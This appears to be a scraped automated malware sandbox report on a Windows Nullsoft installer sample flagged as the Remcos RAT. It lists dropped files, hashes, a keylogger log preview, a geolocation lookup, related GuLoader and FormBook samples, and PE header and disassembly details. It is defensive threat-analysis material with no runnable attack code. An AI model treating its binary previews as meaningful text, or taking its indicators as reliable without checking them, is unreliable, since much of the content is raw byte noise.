                                                                                                                                                                                                                    YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 109.99.162.14
                                                                                                                                                                                                                    PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 109.99.162.14
                                                                                                                                                                                                                    PCB - Lyell Highway Upgrades Queenstown to Strahan - March 2021.XLSMGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    • 109.99.162.14
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\nsb3903.tmp\System.dllZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                      https://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        RFQ_BDS636011.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                          Quotation.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                            CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                              SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):162
                                                                                                                                                                                                                                  Entropy (8bit):3.403794545032098
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:rglsKl+Vlp1ClDl5JWRal2Jl+7R0DAlBG4moojklovDl6v:MlsXP2b5YcIeeDAlS1gWAv
                                                                                                                                                                                                                                  MD5:C6F9ED9A9F5E8EF106A3F8CEE1DCB67C
                                                                                                                                                                                                                                  SHA1:083A6A4FD0A5B65CDC449CC9F030AE837CDAA362
                                                                                                                                                                                                                                  SHA-256:7FFE5E5F82B7A994D5BB55AD0D9C8370CD6AEA79934CCC974BADE7E0BF889114
                                                                                                                                                                                                                                  SHA-512:18E303CC9C8CB049421B12CE3FC43C7CE281139526CCC2F900D2A091BD32E097D86DC62E5D1F06AC56CE341CDC6F82DD07B7A267708F8994C00EE6E9DB444814
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:....[.2.0.2.5./.0.1./.1.4. .0.5.:.0.6.:.3.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):988
                                                                                                                                                                                                                                  Entropy (8bit):5.019276542990248
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:qbkJdVauKyGX852sesPvXhNlT3/75ciWro:Tba0GX85TrPvhjTl2ro
                                                                                                                                                                                                                                  MD5:858F0AE8B388ED2450609FD7EA9E32F1
                                                                                                                                                                                                                                  SHA1:F58ED7EDB0D00FF16D8DAE54D0FDC2A161BD2359
                                                                                                                                                                                                                                  SHA-256:B87B546A2F71BE101274801A3B4613A35B25F991EEF55555276C974173228898
                                                                                                                                                                                                                                  SHA-512:361A7604B9296FB188A9825B621F849E6788E8BD653B41CC9FDE0C93C00B9AD2EB3D74388EC43221AF013F4796A1D2F5AA061C9528F55A61C4B1AADD3A1C1537
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:{. "geoplugin_request":"154.16.49.79",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Washington",. "geoplugin_region":"District of Columbia",. "geoplugin_regionCode":"DC",. "geoplugin_regionName":"District of Columbia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"511",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"38.894",. "geoplugin_longitude":"-77.0365",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25
                                                                                                                                                                                                                                  Entropy (8bit):4.0536606896881855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:8+dB4WYiTNvn:8AbYiTNvn
                                                                                                                                                                                                                                  MD5:08CA75DA54EB4810D18796C97F510A55
                                                                                                                                                                                                                                  SHA1:3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
                                                                                                                                                                                                                                  SHA-256:E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
                                                                                                                                                                                                                                  SHA-512:46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                  Preview:[Bus Clock]..Gats=Galse..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x872c7b17, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):41943040
                                                                                                                                                                                                                                  Entropy (8bit):1.407960157870164
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:VvzaCJjxC4kgtPi9MkAM/aGypYmV8PDQgGEag9jZkoiGsg7/wD7GLJfu2I0lfoBg:ZxC4kg09ldaGypEPDQgGBIu2
                                                                                                                                                                                                                                  MD5:C1D562F16B54BCDDA5C1C51800164052
                                                                                                                                                                                                                                  SHA1:53817D4DBE72A79515260A76ECFE7DC7EE2D95BC
                                                                                                                                                                                                                                  SHA-256:785268C9827A2E6ACCC54C51D4C820B7BDA248CCC3F61A198892AF33DEB81BF7
                                                                                                                                                                                                                                  SHA-512:688D45517E0FBB79C6155E128FD6CDBC4AEFC0C7622296D3BA35FB3F4B714E835D408C6D5D7C927179E335295CCB37125003C1801FE010B763DE940A7774D16B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.,{.... .......3S...........*...y......................X...N........}/......}..h...N.........................Be ....y7.........................................................................................................bJ......n...............................................................N...N....................................... ............}..............................................................N...........................................................................................................................N...:....y!.................................I........}.c................n-.......}..................N........#......h...N...................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                                  Entropy (8bit):5.805604762622714
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                                                                                                                                                                                  MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                                                                                                                                                                                  SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                                                                                                                                                                                  SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                                                                                                                                                                                  SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: ZAMOWIEN.BAT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: RFQ_BDS636011.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: Quotation.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: CERTIFICADO TITULARIDAD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1155000
                                                                                                                                                                                                                                  Entropy (8bit):3.8859756205821308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:uGCTw0AM098lISZXIUDvtA5QNQWjM3Yt+kZ+NCiyCe40DX7DBII0M1S9L76R:JCTw03L9ZXI4a2QGM3HkXkCX7xS9CR
                                                                                                                                                                                                                                  MD5:38A7F42F627D0CFEDB0C6AA615ED9033
                                                                                                                                                                                                                                  SHA1:83D88F62301313DF7684F010059F31E6DFD98F09
                                                                                                                                                                                                                                  SHA-256:5997C5EE4C46C86EE31FE005BD75537E30F9DFEBB101898813142C535902DA9C
                                                                                                                                                                                                                                  SHA-512:19829ACEEFBFA48E9EB68E22FB14602556EA577F8E21A4068FFF9E6C3D56837ADC6B5F560828DB2FFF4E9B62A585F0FA8E16BD20B452FFB02BB73EE293D8F8D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:H.......,...................V...,...............H...........................................................................................................................................................................................................................................G...Y...........,...j...............................................................................................................................b...................W...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):578624
                                                                                                                                                                                                                                  Entropy (8bit):7.733854525663187
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:UnPdMEc/A4e/wKOBwCYSUu9EEwH5IvhJGspQCZu6:EPdMEc/AN/XOBwCYSN9EEwZI6spQR6
                                                                                                                                                                                                                                  MD5:5266C53649CAA9EDEA2F4AB58D58F511
                                                                                                                                                                                                                                  SHA1:CC4DEA13BD65697EF12E10CC404FBEBCA42F48EE
                                                                                                                                                                                                                                  SHA-256:70C1D9F480BBA58360E42AF222D4C1A3FF7DC5D0F2A6D96B1650DC6076027D52
                                                                                                                                                                                                                                  SHA-512:3284C03BBDC622D6F4F2DFC2F77E37540E9007382E1C44CC1B98CC0AEBF63C125C1560B59D429F8780A2B0D0450BD31566B946C4DAA6F3C142520C25BD01E56F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..........................0............@.............................................X............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):114454
                                                                                                                                                                                                                                  Entropy (8bit):1.2519787240577294
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:RRDt23AKhN87PfNufvVxTfdx5U5Flf6VAETw:YEevVx2h
                                                                                                                                                                                                                                  MD5:F85E20AA1A28EEFFC89F744F6B6B67B3
                                                                                                                                                                                                                                  SHA1:B61AEF131017C5605647983CE2D55769914BB104
                                                                                                                                                                                                                                  SHA-256:C388ED22B7E44C0C3FDD6D064DD070DCA64CEA1E83D6151566641E7438C346ED
                                                                                                                                                                                                                                  SHA-512:EA89503F496B30DA5EAA74BB479007BB6B93463B775F16810A4391E79389A219398AC81DCCDD79C3F60E85DF77AA985E405BDF7B477C8F3217ECC3B7460BEE6A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...............................m.......................5............}.......t......^..................................................)..........................................;......B.......................................................................*....................3.......s.......................+.+...@=.......O..........................G...................M...........g...................#.........................................................................................................v......................e........n......,...................b.................................e.................Y.......=..........................................................a........j.../.........#..........................`..................................>........\..................................... ..................................................g..R.........................................................................g...............................N....................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):310550
                                                                                                                                                                                                                                  Entropy (8bit):1.2527719188567612
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:CfvXvtPDO00Rz1DXs2sASdJwvyfnpZkL:klDO0MDRS9k
                                                                                                                                                                                                                                  MD5:72FA348549D0BD9CE66E5F3EBA54DF3A
                                                                                                                                                                                                                                  SHA1:D5B4797D07374226CD8173964DF8753F4ABB9E6E
                                                                                                                                                                                                                                  SHA-256:7F24A44B47D2C036AACE03D4F5EBEA053CED6ED06CE01ED70E6FD8AEE8211CC9
                                                                                                                                                                                                                                  SHA-512:D375FC28BBA68A52E4C2CB97A9ADA416D38F29B21004F1853DC14ACF28CDE2A802D51FD66901D993DAA58E50D8C87FD2A8827482633B0B9874FF64F8442492B1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...e......J.........................................................................................................................................J........K...............................L...........................v.............................................................................%..:...................F.................................................................|...1.....A..................................1........d...................J..X..........................x..............x..."..........................`.........................................................[...................t.......................2..............................................................................t....................................................$...\...............!..........................|....................................r.............................W.............................................X.....................................................q.................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):309745
                                                                                                                                                                                                                                  Entropy (8bit):7.569098036898635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:5GCTw0AM098lISZXIUDvtA5QNQWjM3Yt+kZ+NCiyC6:kCTw03L9ZXI4a2QGM3HkX1
                                                                                                                                                                                                                                  MD5:E5DB339C9BC74BBBF87F00D895C3CE7D
                                                                                                                                                                                                                                  SHA1:7E81D22286BBC4F9DE3EE19632FE4393C000A19C
                                                                                                                                                                                                                                  SHA-256:85BD4C3E0830FF240D546F22B590A70A78C9D273ABEDCEC034C07794A170A319
                                                                                                                                                                                                                                  SHA-512:A6ECC38DD64383B6355111D7454FDE81B103601439AB7B9C83951A4CCE182031D16BE5E1096C905335E1C970942875B8CD35BFC400AF3CF470DBFE527832576F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...................................."..}}}}........&..u..44.@.......SS.........eeee.........]....................****............c..............................C.MM...........HH...................II....................{{{{......aaaa......tt...................h............a..V.............$............ee...NNN.U...Y.G........:...............................||................V.''''.....................;..W.`...GG...77.......Z.U.ll......d.iiii.WWWW................4..OO............RRRR.l..........T.................F.......................f.........i...............................22.....E........F...................;............ttt......."".......%............>>.JJJJ.~~.......................I........Q..........................S.YYY...................w..V.....|..@@.$$.<........(.'''''.....h...................WW...||.;.9999...s...&...ii..a...::::..N..........!..>....i.11.....y.....3..M..x..............oo........=...aa........0..........)...........r.........ii.............}}...........ooo...
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 8589934592.000000
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):267655
                                                                                                                                                                                                                                  Entropy (8bit):1.2559804952290619
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:HbUhrUe+zlum+LaFrAX40edupFSsZVfeTkVhbbCGx6+ZOoJrrSVlRM9k8rZgQWze:ICFg/VP97pb14sZg
                                                                                                                                                                                                                                  MD5:F6A4342C9271CFFEF29695EEA330941E
                                                                                                                                                                                                                                  SHA1:291ABCFA507BA730832511E5F47EAA2CB4DFABBD
                                                                                                                                                                                                                                  SHA-256:605B31C886C5989625152D1CD58BCACF2827DE36CC67B5D94D6B425955CEDBA6
                                                                                                                                                                                                                                  SHA-512:D839DD8E3D74B7500F32318403BEAC3BA2DA83C48EF21555E78D368AA0404AC750DB1DD7EB8A7196DA32FBE3D880B66ED3166A39F17D8D0D13C9C4B19435530C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:...........T.........'......'....A........s.................@.....................................................................N......M...........^................................t............Q.......R...r.........................................................6..................Q...I........<....d......................................................................................B.....p............/.........................................."...b..@...................Q...........!.................................f............................`.................d.................................L.........f...o....................................................................................s...................i.....................S.b..A...............................................................U..o................................................................../...............................................................................................`..................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):133033
                                                                                                                                                                                                                                  Entropy (8bit):4.593734870096358
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:sS8+1gLo/MpFTtd62wA8i0rH/SHGphackCh1Up78GsvP2Jl275nr4okWO/h:BgL6MpFberHX9JhBPBEokr
                                                                                                                                                                                                                                  MD5:5571C0F9CABA24DDC31B19F2680AC58C
                                                                                                                                                                                                                                  SHA1:7D80A671FCE50A911EC74C527770D6D1EC92C0FC
                                                                                                                                                                                                                                  SHA-256:21B871645A5DE53B99910AC3F464A5E9C6C29715603F4975F437C2A9FF3B264A
                                                                                                                                                                                                                                  SHA-512:8E33180BA9D6165C44B03B56A8224C7D0F2FBACB06102C0FD195391F2350DE648AC4CAB82D58D59D87B83519B484242061F4122082099B6595F91C090FFBEA89
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:....>..............o.............'.............{.......TT.............b....222222.....LL.w......UU.,.....##..............||........._..........~~~~~..jj...D...MMM...............................[...j......'.................>>..ccccc............................k...........................mmm.............$$...................{.......................VV.....UUU.....33.........L.ww....LLLL...................Y........ss.*......b..........................F................n...88...l.&.....@@..........l........q.......GG.........................r.......PP..C....y......................................EE............i.......F.>...........(...........g..........{{..E........................--......................-.................;.............bb.....ssssss...WW.....WW.E..).._.....[[.NNN.........u.....X..q......IIII...qq...............xxx...pp..............x..........oo......-.................................G..............................................[.u....................OOOOO................
                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                  Entropy (8bit):7.733854525663187
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                  File name:2T10XBqS6g.exe
                                                                                                                                                                                                                                  File size:578'624 bytes
                                                                                                                                                                                                                                  MD5:5266c53649caa9edea2f4ab58d58f511
                                                                                                                                                                                                                                  SHA1:cc4dea13bd65697ef12e10cc404fbebca42f48ee
                                                                                                                                                                                                                                  SHA256:70c1d9f480bba58360e42af222d4c1a3ff7dc5d0f2a6d96b1650dc6076027d52
                                                                                                                                                                                                                                  SHA512:3284c03bbdc622d6f4f2dfc2f77e37540e9007382e1c44cc1b98cc0aebf63c125c1560b59d429f8780a2b0d0450bd31566b946c4daa6f3c142520c25bd01e56f
                                                                                                                                                                                                                                  SSDEEP:12288:UnPdMEc/A4e/wKOBwCYSUu9EEwH5IvhJGspQCZu6:EPdMEc/AN/XOBwCYSN9EEwZI6spQR6
                                                                                                                                                                                                                                  TLSH:4EC4F1F6F650C267E61F0D34DA72A8F01990BC39D1D1483B43A47DADF472A62589BA0F
                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....
                                                                                                                                                                                                                                  Icon Hash:4571753721719a8d
                                                                                                                                                                                                                                  Entrypoint:0x403645
                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                  Time Stamp:0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                  OS Version Major:4
                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                  File Version Major:4
                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                  Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                  sub esp, 000003F8h
                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                  pop edi
                                                                                                                                                                                                                                  xor ebp, ebp
                                                                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                                                                  mov dword ptr [esp+20h], ebp
                                                                                                                                                                                                                                  mov dword ptr [esp+18h], 0040A230h
                                                                                                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                  call dword ptr [004080A0h]
                                                                                                                                                                                                                                  mov esi, dword ptr [004080A4h]
                                                                                                                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                  mov dword ptr [esp+4Ch], ebp
                                                                                                                                                                                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                                                                                                                                                                                  mov dword ptr [esp+00000150h], ebp
                                                                                                                                                                                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                                                                                                                                                                                  call esi
                                                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                                                  jne 00007F33045C6E4Ah
                                                                                                                                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                  mov dword ptr [esp+34h], 00000114h
                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                  call esi
                                                                                                                                                                                                                                  mov ax, word ptr [esp+48h]
                                                                                                                                                                                                                                  mov ecx, dword ptr [esp+62h]
                                                                                                                                                                                                                                  sub ax, 00000053h
                                                                                                                                                                                                                                  add ecx, FFFFFFD0h
                                                                                                                                                                                                                                  neg ax
                                                                                                                                                                                                                                  sbb eax, eax
                                                                                                                                                                                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                                                                                                                                  not eax
                                                                                                                                                                                                                                  and eax, ecx
                                                                                                                                                                                                                                  mov word ptr [esp+00000148h], ax
                                                                                                                                                                                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                                                                                                                                                                                  jnc 00007F33045C6E18h
                                                                                                                                                                                                                                  and word ptr [esp+42h], 0000h
                                                                                                                                                                                                                                  mov eax, dword ptr [esp+40h]
                                                                                                                                                                                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                                                                                                                                                                                  mov dword ptr [00429B18h], eax
                                                                                                                                                                                                                                  xor eax, eax
                                                                                                                                                                                                                                  mov ah, byte ptr [esp+38h]
                                                                                                                                                                                                                                  movzx eax, ax
                                                                                                                                                                                                                                  or eax, ecx
                                                                                                                                                                                                                                  xor ecx, ecx
                                                                                                                                                                                                                                  mov ch, byte ptr [esp+00000148h]
                                                                                                                                                                                                                                  movzx ecx, cx
                                                                                                                                                                                                                                  shl eax, 10h
                                                                                                                                                                                                                                  or eax, ecx
                                                                                                                                                                                                                                  movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x18858.rsrc
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
